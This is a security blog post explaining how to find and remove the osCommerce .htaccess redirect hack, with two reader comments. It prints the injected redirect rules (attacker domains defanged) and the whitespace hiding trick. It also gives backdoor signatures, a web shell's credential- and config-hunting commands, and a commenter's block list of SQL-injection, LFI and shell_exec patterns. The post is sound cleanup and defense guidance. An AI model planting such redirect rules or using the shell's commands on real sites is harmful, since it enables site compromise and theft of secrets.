msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Another Update on the osCommerce .htaccess Hack

   18 Jan 11   Filed in Website exploits

The osCommerce .htaccess hack that I wrote about here and here is still quite prevalent.

Some webmasters have problems locating the rogue .htaccess files so I decided to address this issue again.

1. The malicious redirect rules. Here is the code that you should find and remove from your .htaccess files:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ hxxp://drevingjp .tk/in.cgi?4 [R=301,L]

2. The last line of this code may change every day — hackers regularly update the redirect target domain.

3. Whitespace. To hide this relatively big piece of code, hackers insert a few screens of whitespace before it. You should scroll down to find it.

Moreover, there is a new modification of this trick: there may also be several screens of whitespace after the code, so that if you scroll the file all the way down, you won’t see the malicious redirect rules either. Plus, they add 120 whitespace characters to the left of the code and 120 characters to the right of the code. As a result, the malicious code will be outside of the visible area in almost any text viewer/editor even if you slowly scroll the file vertically and horizontally.

For example, I have a real .htaccess file that looks empty but its size is 3951 bytes. It had 134 “empty” lines. The position of the first character of the topmost redirect rule was (line: 49, column: 121) and the position of the last character of the last rule was (line: 84, column: 177). Each rule had 100+ trailing whitespaces up to column 281.

4. Location. The tampered .htaccess file can be usually found in the site root directory and in the directory above the site root.

5. Above the site root directory … Some hosting providers configure FTP access so that webmasters can’t open anything above the site root. This restriction only works against less experienced webmasters who can accidentally shoot themselves in the foot if they have access to all their directories. Unfortunately, this can’t stop hackers from accessing and writing to user directories above the site root using simple PHP scripts. As a result, webmasters can’t see and delete rogue .htaccess files in their own directories!

Here’s a simple PHP code that can show your files in the directory above your site root:

<?php
$adir = "..";
$handle=opendir($adir);
while (($file = readdir($handle))!==false) {
$fpath = "$adir/$file";
$n=fileowner($fpath);
$d = date ("F d Y H:i:s.", filemtime($fpath));
echo "$file : ";
echo substr(sprintf("%o",fileperms("$fpath")),-4);
echo " : $n : $d";
echo "</br>";
}
closedir($handle);
?>

Just create a .php file (e.g. uplist.php) with the above content and upload it to the root directory of your site. Then open it in your web browser (e.g. http://www.your-site-domain.com/uplist.php). It should show directories, files, their owners, permissions and dates. This way you’ll be able to check if there’s a .htaccess file above you site root directory.

If it is there, you can delete it using another simple .php script.

<?php
$filename = '../.htaccess';
unlink($filename);
?>

Again, place the file in the root directory (important!) and open it in a web browser. That’s it.

Don’t forget to delete these .php files when done (they may be abused).

6. Admin interface redirects. In some cases I noticed that files in the /admin directory also redirect to the same malicious sites. In this case redirect is not conditional. It occurs even if I don’t have a search engine as a referrer. Sometimes only individual files in the admin directory are affected (e.g file_manager.php). Most likely some .php code has been injected into those files (let me know if you know more about this redirect). When you clean up your sites, make sure to check files in the admin directory for integrity.

7. Backdoor files. Many webmasters of infected sites report that they find backdoor files on their servers.

Make sure to search for suspicious files and directories. Usually backdoor files contain string like

eval(gzuncompress(base64_decode(…
eval(base64_decode(…
edoced_46esab

gzinflate(

Many infected osCommerce site have backdoors with filenames that resemble Google’s Webmaster Tools verification files, only with the .php extenstion. e.g. google24b97876256ad178.php. These files usually contain a so called “Web Shell by boff” that hackers use to work with files on compromised servers.

You can have the idea about the things that hackers can do with this shell if I post a list of its built-in shortcut commands:

"List dir"
"list file attributes on a Linux second extended file system"
"show opened ports"
"process status"
"find all suid files"
"find suid files in current dir"
"find all sgid files"
"find sgid files in current dir"
"find config.inc.php files"
"find config* files"
"find config* files in current dir"
"find all writable folders and files"
"find all writable folders and files in current dir"
"find all service.pwd files"
"find service.pwd files in current dir"
"find all .htpasswd files"
"find .htpasswd files in current dir"
"find all .bash_history files"
"find .bash_history files in current dir"
"find all .fetchmailrc files"
"find .fetchmailrc files in current dir"
"locate httpd.conf files"
"locate vhosts.conf files"
"locate proftpd.conf files"
"locate psybnc.conf files"
"locate my.conf files"
"locate admin.php files"
"locate cfg.php files"
"locate conf.php files"
"locate config.dat files"
"locate config.php files"
"locate config.inc files"
"locate config.inc.php"
"locate config.default.php files"
"locate config* files "
"locate .conf files"
"locate .pwd files"
"locate .sql files"
"locate .htpasswd files"
"locate .bash_history files"
"locate .mysql_history files"
"locate .fetchmailrc files"
"locate backup files"
"locate dump files"
"locate priv files"

Windows servers can also provide interesting information to hackers:

"List Directory"
"Find index.php in current dir"
"Find *config*.php in current dir"
"Show active connections"
"Show running services"
"User accounts"
"Show computers"
"ARP Table"
"IP Configuration"

If hackers use vulnerabilities in PHP files to create backdoors (in case of osCommerce it’s usually file_manager.php), then the backdoors will have the same permissions as the site owner. This means that they can overwrite read-only files, create directories and change file permissions. So changing .htaccess permissions to 444 (read-only for all) won’t save them from modifications if hackers use backdoor files. That’s why it is very important to find and delete all backdoor files. Otherwise, the infection can return.

8. Hardening osCommerce. Once again, I suggest that you read the following pages:

http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/
http://blog.sucuri.net/2010/11/continuing-attacks-against-oscommerce-sites.html

They’ll help you harden osCommerce (and CRE Loaded) sites.

9. If you want to add some more facts about this osCommerce hack, please use the comments section below.

Related posts:

Reader's Comments (2)

  1. |

    A hacker using IP 109.206.183.48 today added similar rewrite conditions to .htaccess with the following rewrite rule:
    RewriteRule .* hxxp://kelleytexas .com/images/hurricane/kee.php [R,L]

  2. |

    Try this one


    ########## Hardcore Security for osCommerce HTACCESS v1.0.1 ###########
    ########## AUTHOR: TE TAIPO - rohepotae@gmail.com ###########
    ## See readme.txt for instructions ###########

    Options +SymLinksIfOwnerMatch

    # disable the server signature
    ServerSignature off

    # set the server administrator email
    SetEnv SERVER_ADMIN default@yourdomain.com

    # ~~~~ START OF FILTERING ~~~~~ #

    # secure htaccess and other files

    Order Allow,Deny
    Deny from all

    # add whatever configuration files here that are hosted on your server
    # that you want blocked

    Order allow,deny
    Deny from all

    # disable access to the osCommerce config.php

    deny from all

    # disable access to the osCommercce admin config.php

    deny from all

    RewriteEngine On
    RewriteBase /

    # server request method
    RewriteCond %{REQUEST_METHOD} !^(GET|POST|HEAD|OPTIONS) [OR]

    # osCommerce 2.2x
    RewriteCond %{THE_REQUEST} ^.*\.php/login\.php.*$ [NC,OR]
    RewriteCond %{THE_REQUEST} ^.*login.php\?action\=backupnow.*$ [NC,OR]

    # _REQUEST
    RewriteCond %{THE_REQUEST} \?\ HTTP/1. [NC,OR]
    RewriteCond %{THE_REQUEST} \/\*\ HTTP/1. [NC,OR]
    RewriteCond %{THE_REQUEST} %20HTTP/1. [NC,OR]
    RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]
    RewriteCond %{THE_REQUEST} (showimg=|cookies=|passwd) [NC,OR]
    RewriteCond %{QUERY_STRING} (file_get_contents\(|setcookie\() [NC,OR]
    RewriteCond %{QUERY_STRING} (\,0x3a\,|unescape\(|fromcharcode|pwtoken_get|php_uname|passthru\() [NC,OR]
    RewriteCond %{QUERY_STRING} (eval\%28|eval\%2528|eval\(|base64_(en|de)code[^(]*\([^)]*\)|base64_encode.*\(.*\)) [NC,OR]
    RewriteCond %{QUERY_STRING} (JHs\=|replace\(|return\%20clk|boot\.ini|php\/password_for|announce\?info_hash) [NC,OR]
    RewriteCond %{QUERY_STRING} (\_START\_|\=alert\(|mysql\_query|\.\.\/cmd|rush\=|EXTRACTVALUE\(|phpinfo\() [NC,OR]
    RewriteCond %{QUERY_STRING} (\/frameset|\$\_SESSION|\$\_REQUEST|\$HTTP\_|mosConfig\_|inurl\:|\/iframe|onload\=) [NC,OR]
    RewriteCond %{THE_REQUEST} (allow_url_fopen|\%23include\+\<|get_defined_vars\(|\%22\'\%2f|error_reporting\(0\)) [NC,OR]
    RewriteCond %{THE_REQUEST} (fwrite\(|waitfor\%20delay|shell_exec|gzinflate\(|prompt\(|php_value\%20auto) [NC,OR]
    RewriteCond %{THE_REQUEST} (onmouseover|onmousedown|ct\(this) [NC,OR]
    RewriteCond %{THE_REQUEST} (ftp\:\/\/|1\=1\-\-|current\_user\(\)|\%3Cform|sha1\(|self\/environ) [NC,OR]
    RewriteCond %{THE_REQUEST} (\<\%3Fphp|\%\%|1\+and\+1|\/iframe|\$\_GET|document\.cookie|onload\%3d|onunload\%3d) [NC,OR]
    RewriteCond %{THE_REQUEST} (\%00|hex\_ent|ob\_starting|PHP\_SELF|etc\/passwd|shell\_exec|data\:\/\/|\$\_SERVER|\$\_POST) [NC,OR]
    RewriteCond %{THE_REQUEST} (\%bf\%5c\%27|\%bf\%27|\%ef\%bb\%bf|\%8c\%5c|\%a3\%27) [NC,OR]
    RewriteCond %{THE_REQUEST} (\=0\^\() [NC,OR]
    RewriteCond %{THE_REQUEST} (\@\@datadir|\@\@version|version\(\)|localhost|\}\)\%3B|Set\-Cookie|\%253C\%2Fscript\%253E) [NC,OR]
    RewriteCond %{THE_REQUEST} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

    # http referer
    RewriteCond %{HTTP_REFERER} (|'|%0A|%0D|%00) [NC,OR]

    # mysql related
    RewriteCond %{QUERY_STRING} (null\,null|outfile|load_file) [NC,OR]
    RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]
    RewriteCond %{QUERY_STRING} (order).*(by).*(\%[0-9A-Z]{0,2}) [NC,OR]
    RewriteCond %{QUERY_STRING} (waitfor|delay|shutdown).*(nowait) [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(ascii\(|bin\(|benchmark\(|cast\(|char\(|charset\(|collation\(|concat\(|concat_ws\(|table_schema) [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(conv\(|convert\(|count\(|database\(|decode\(|diff\(|distinct\(|elt\(}encode\(|encrypt\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(extract\(|field\(|floor\(|format\(|hex\(|if\(|in\(|information_schema|insert\(|instr\(|interval\(|lcase\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(left\(|length\(|load_file\(|locate\(|lock\(|log\(|lower\(|lpad\(|ltrim\(|max\(|md5\(|mid\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(mod\(|now\(|null\(|ord\(|password\(|position\(|quote\(|rand\(|repeat\(|replace\(|reverse\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(right\(|rlike\(|row_count\(|rpad\(|rtrim\(|_set\(|schema\(|sha1\(|sha2\(|sleep\(|soundex\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(space\(|strcmp\(|substr\(|substr_index\(|substring\(|sum\(|time\(|trim\(|truncate\(|ucase\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(unhex\(|upper\(|_user\(|user\(|values\(|varchar\(|version\(|xor\() [NC,OR]

    # cookies
    RewriteCond %{HTTP_COOKIE} (|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
    RewriteCond %{HTTP_COOKIE} (eval\%28|eval\%2528|eval\(|information_schema) [NC,OR]
    RewriteCond %{HTTP_COOKIE} (null\,null|outfile) [NC,OR]
    RewriteCond %{HTTP_COOKIE} union([^a]*a)+ll([^s]*s)+elect [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(ascii\(|bin\(|benchmark\(|cast\(|char\(|charset\(|collation\(|concat\(|concat_ws\(|table_schema) [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(conv\(|convert\(|count\(|database\(|decode\(|diff\(|distinct\(|elt\(}encode\(|encrypt\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(extract\(|field\(|floor\(|format\(|hex\(|if\(|in\(|information_schema|insert\(|instr\(|interval\(|lcase\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(left\(|length\(|load_file\(|locate\(|lock\(|log\(|lower\(|lpad\(|ltrim\(|max\(|md5\(|mid\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(mod\(|now\(|null\(|ord\(|password\(|position\(|quote\(|rand\(|repeat\(|replace\(|reverse\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(right\(|rlike\(|row_count\(|rpad\(|rtrim\(|_set\(|schema\(|sha1\(|sha2\(|sleep\(|soundex\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(space\(|strcmp\(|substr\(|substr_index\(|substring\(|sum\(|time\(|trim\(|truncate\(|ucase\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(unhex\(|upper\(|_user\(|user\(|values\(|varchar\(|version\(|xor\() [NC,OR]

    # LFI and session hijacking
    RewriteCond %{QUERY_STRING} \=(\.\./\.\.//?)+ [OR]
    RewriteCond %{QUERY_STRING} \=(\.\.//\./?)+ [OR]
    RewriteCond %{QUERY_STRING} \=(\.\.\\\.\./?)+ [OR]
    RewriteCond %{QUERY_STRING} \=(\.\.\\\\\./?)+ [OR]
    RewriteCond %{QUERY_STRING} \/tmp\/sess_ [NC,OR]
    RewriteCond %{QUERY_STRING} php:\/\/filter\/read=convert\.base64-(en|de)code\/ [NC,OR]

    # if expose_php is set to on
    RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC]

    RewriteRule ^(.*)$ - [F,L]

    # ~~~~ END OF FILTERING ~~~~~ #
    # OPTIONAL EXTRAS
    # Uncomment and use.
    # If Error 500 encountered then comment out

    # disable directory browsing, if error 500 encountered then comment out
    # Options All -Indexes

    # prevent folder listing, if error 500 encountered then comment out
    # IndexIgnore *

    # php_value session.use_trans_sid 0

    # auto keep the config file read only
    # chmod configure.php files 444

    # turn off magic_quotes_gpc
    #
    # php_flag magic_quotes_gpc off
    #

    ########## End of Hardcore Security for osCommerce HTACCESS v1.0.1 #################